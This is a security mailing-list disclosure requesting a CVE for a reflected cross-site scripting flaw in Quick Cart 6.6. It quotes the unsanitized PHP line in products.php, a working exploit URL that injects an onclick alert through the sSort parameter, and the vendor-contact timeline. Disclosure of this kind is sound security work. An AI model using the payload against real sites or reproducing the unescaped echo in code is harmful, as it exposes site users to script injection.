Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 19 Jan 2016 18:12:57 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request: Quick Cart v6.6 XSS Vulnerability

## FULL DISCLOSURE

#Product    : Quick Cart
#Version    : 6.6
#Home page Link  : http://opensolution.org/home.html
#Date        : 19/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
 "sSort" parameter is not sanitized that leads to Reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: products.php

Found at line:26
<?php if( isset( $sSort ) ) echo '<input type="hidden" name="sSort"
value="'.$sSort.'" />'; ?>

----------------------------------------
Exploit:
----------------------------------------
localhost/Quick.Cart_v6.6/admin.php?p=pages-list&sSort="%20onclick="alert(1)&sPhrase=

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/quick-cartv6-6xsspoc.png


Disclosure Timeline:
Tried to contact vendor via email  : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016

Pub ref:
https://0x62626262.wordpress.com/2016/01/19/quick-cart-v-6-6-xss-vulnerability

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ